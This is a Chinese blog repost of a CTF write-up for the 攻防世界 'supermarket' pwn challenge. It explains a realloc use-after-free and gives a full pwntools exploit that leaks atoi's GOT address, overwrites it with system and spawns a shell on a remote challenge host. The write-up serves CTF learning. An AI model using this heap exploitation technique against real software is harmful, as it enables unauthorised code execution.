攻防世界 Pwn supermarket

2023-11-07 00:10
文章标签 世界 攻防 pwn supermarket

本文主要是介绍攻防世界 Pwn supermarket,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

攻防世界 Pwn supermarket

  • 1.题目下载地址
  • 2.checksec
  • 3.IDA分析
  • 4.exp

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述

3.IDA分析

在这里插入图片描述

  • 这里出现漏洞

  • 我们需要先了解realloc
    realloc原型是extern void *realloc(void *mem_address, unsigned int newsize);

  • 先判断当前的指针是否有足够的连续空间,如果有,扩大mem_address指向的地址,并且将mem_address返回,如果空间不够,先按照newsize指定的大小分配空间,将原有数据从头到尾拷贝到新分配的内存区域,而后释放原来mem_address所指内存区域(注意:原来指针是自动释放,不需要使用free),同时返回新分配的内存区域的首地址。即重新分配存储器块的地址。

  • 本程序中,realloc后,并没有把返回值重新赋值给node0->description,因此,当realloc的newsize大于原来的size时,原来区域的空间会被free掉,由于没有把返回地址赋给node0->description,因此存在UAF漏洞。

  • 并且,由于创建node时,是先malloc node结构体,然后再malloc description的空间,所以,当我们再次申请创建一个node时,如果满足条件,node结构体就会申请到node0->description,然后,我们编辑node0的description就是编辑node1的结构体,我们把node1的description指向atoi的got表,我们就可以实现泄露atoi的地址以及修改atoi的GOT表。

  • 注意,我们的node0的description的大小必须为unsorted bin,因为,这样我们才能让node2的结构体申请到node0->description处,因为结构体空间大小为0x1C,刚好满足小于node0->description地址处空间的大小,可以从中切割区域。如果要使用fastbin的话,是不可行的,因为fastbin是当要申请的空间大小和空闲的空间大小一模一样时,才能分配到那个空闲的块处,假如我们设置的大小为0x1C,但是本题的用来获取输入的函数最多只能输入n-1个字符,最后一个字符会强制设置为0,而我们要把atoi的got表地址覆盖到node2->description,由于该字段位于结构体最后,因此,我们将会覆盖不完整。所以,我们使用unsorted bin。
    原文点击此处查看

  • 本题主要是利用了UAF漏洞

  • 当我们成功修改了node2的结构体时,我们就成功了八成了。只要我们把node2-> description指向atoi的got表,那么我们编辑node2的description时就是在编辑atoi的got表

4.exp

#coding:utf8  
from pwn import *  
from LibcSearcher import *  #sh = process('./supermarket')  
sh = remote('111.198.29.45',55879)  
elf = ELF('./supermarket')  
atoi_got = elf.got['atoi']  def create(index,size,content):  sh.sendlineafter('your choice>>','1')  sh.sendlineafter('name:',str(index))  sh.sendlineafter('price:','10')  sh.sendlineafter('descrip_size:',str(size))  sh.sendlineafter('description:',content)  def delete(index):  sh.sendlineafter('your choice>>','2')  sh.sendlineafter('name:',str(index))  def show():  sh.sendlineafter('your choice>>','3')  def edit(index,size,content):  sh.sendlineafter('your choice>>','5')  sh.sendlineafter('name:',str(index))  sh.sendlineafter('descrip_size:',str(size))  sh.sendlineafter('description:',content)  #node0  
create(0,0x80,'a'*0x10)  
#node1,只用来做分隔作用,防止块合并  
create(1,0x20,'b'*0x10)  
#realloc node0->description  
#注意不要加任何数据,因为我们发送的数据写入到的是一个被free的块(仔细思考一下这句话),这会导致后面malloc时出错  
edit(0,0x90,'')  
#现在node2将被分配到node0的原description处  
create(2,0x20,'d'*0x10)  
payload = '2'.ljust(16,'\x00') + p32(20) + p32(0x20) + p32(atoi_got)  
#由于没有把realloc返回的指针赋值给node0->description,因此node0->description还是原来那个地址处,现在存的是node1  
#因此edit(0)就是编辑node1的结构体,我们通过修改,把node1->description指向atoi的got表  
edit(0,0x80,payload)  
#泄露信息  
show()  
sh.recvuntil('2: price.20, des.')  
#泄露atoi的加载地址  
atoi_addr = u32(sh.recvuntil('\n').split('\n')[0].ljust(4,'\x00'))  libc = LibcSearcher('atoi',atoi_addr)  
libc_base = atoi_addr - libc.dump('atoi')  
system_addr = libc_base + libc.dump('system')  
#修改atoi的表,将它指向system  
edit(2,0x20,p32(system_addr))  
#getshell  
sh.sendlineafter('your choice>>','/bin/sh')  sh.interactive()  

这篇关于攻防世界 Pwn supermarket的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/359913

相关文章

揭秘世界上那些同时横跨两大洲的国家

我们在《世界人口过亿的一级行政区分布》盘点全球是那些人口过亿的一级行政区。 现在我们介绍五个横跨两州的国家,并整理七大洲和这些国家的KML矢量数据分析分享给大家,如果你需要这些数据,请在文末查看领取方式。 世界上横跨两大洲的国家 地球被分为七个大洲分别是亚洲、欧洲、北美洲、南美洲、非洲、大洋洲和南极洲。 七大洲示意图 其中,南极洲是无人居住的大陆,而其他六个大洲则孕育了众多国家和

简单的Q-learning|小明的一维世界(3)

简单的Q-learning|小明的一维世界(1) 简单的Q-learning|小明的一维世界(2) 一维的加速度世界 这个世界,小明只能控制自己的加速度,并且只能对加速度进行如下三种操作:增加1、减少1、或者不变。所以行动空间为: { u 1 = − 1 , u 2 = 0 , u 3 = 1 } \{u_1=-1, u_2=0, u_3=1\} {u1​=−1,u2​=0,u3​=1}

简单的Q-learning|小明的一维世界(2)

上篇介绍了小明的一维世界模型 、Q-learning的状态空间、行动空间、奖励函数、Q-table、Q table更新公式、以及从Q值导出策略的公式等。最后给出最简单的一维位置世界的Q-learning例子,从给出其状态空间、行动空间、以及稠密与稀疏两种奖励函数的设置方式。下面将继续深入,GO! 一维的速度世界 这个世界,小明只能控制自己的速度,并且只能对速度进行如下三种操作:增加1、减

【Linux】萌新看过来!一篇文章带你走进Linux世界

🚀个人主页:奋斗的小羊 🚀所属专栏:Linux 很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~ 目录 前言💥1、初识Linux💥1.1 什么是操作系统?💥1.2 各种操作系统对比💥1.3 现代Linux应用💥1.4 Linux常用版本 💥2、Linux 和 Windows 目录结构对比💥2.1 文件系统组织方式💥2.2

Elasticsearch:无状态世界中的数据安全

作者:来自 Elastic Henning Andersen 在最近的博客文章中,我们宣布了支持 Elastic Cloud Serverless 产品的无状态架构。通过将持久性保证和复制卸载到对象存储(例如 Amazon S3),我们获得了许多优势和简化。 从历史上看,Elasticsearch 依靠本地磁盘持久性来确保数据安全并处理陈旧或孤立的节点。在本博客中,我们将讨论无状态的数据持

【AI大模型应用开发】2.1 Function Calling连接外部世界 - 入门与实战(1)

Function Calling是大模型连接外部世界的通道,目前出现的插件(Plugins )、OpenAI的Actions、各个大模型平台中出现的tools工具集,其实都是Function Calling的范畴。时下大火的OpenAI的GPTs,原理就是使用了Function Calling,例如联网检索、code interpreter。 本文带大家了解下Function calling,看

005:VTK世界坐标系中的相机和物体

VTK医学图像处理---世界坐标系中的相机和物体 左侧是成像结果                                                    右侧是世界坐标系中的相机与被观察物体 目录 VTK医学图像处理---世界坐标系中的相机和物体 简介 1 在三维空间中添加坐标系 2 世界坐标系中的相机 3 世界坐标系中vtkImageData的参数 总结:

深入RabbitMQ世界:探索3种队列、4种交换机、7大工作模式及常见概念

文章目录 文章导图RabbitMQ架构及相关概念四大核心概念名词解读 七大工作模式及四大交换机类型0、前置了解-默认交换机DirectExchange1、简单模式(Simple Queue)-默认DirectExchange2、 工作队列模式(Work Queues)-默认DirectExchange3、发布/订阅模式(Publish/Subscribe)-FanoutExchange4、路

攻防世界 unseping

unseping 攻防世界web新手练习 -unseping_攻防世界web新手题unseping-CSDN博客 这道题对我来说还是有点难,什么oct绕过命令执行第一次遇到捏,所以基本是跟着别人的wp写的,一点点记录吧 先对源码进行分析 <?phphighlight_file(__FILE__);//定义了一个ease类class ease{private $method;privat

世界公认十大护眼灯数据出炉!一文看懂孩子用的台灯哪个牌子好

近年来,随着科技的迅猛发展,诸如智能手机、电脑等电子设备在工作、学习及娱乐中的应用日益广泛,人们对这些设备的依赖程度也随之加深。然而,长时间面对屏幕不可避免地给眼睛带来伤害,如眼疲劳、干燥甚至近视等问题。因此,市场对能够缓解眼疲劳的照明产品的需求日益增长。这类护眼照明产品通常采用无频闪、无紫外线辐射等技术,旨在减少对眼睛的潜在危害,有效保护视力健康,并降低眼疾的发生率。随着护眼台灯的不断创新进步,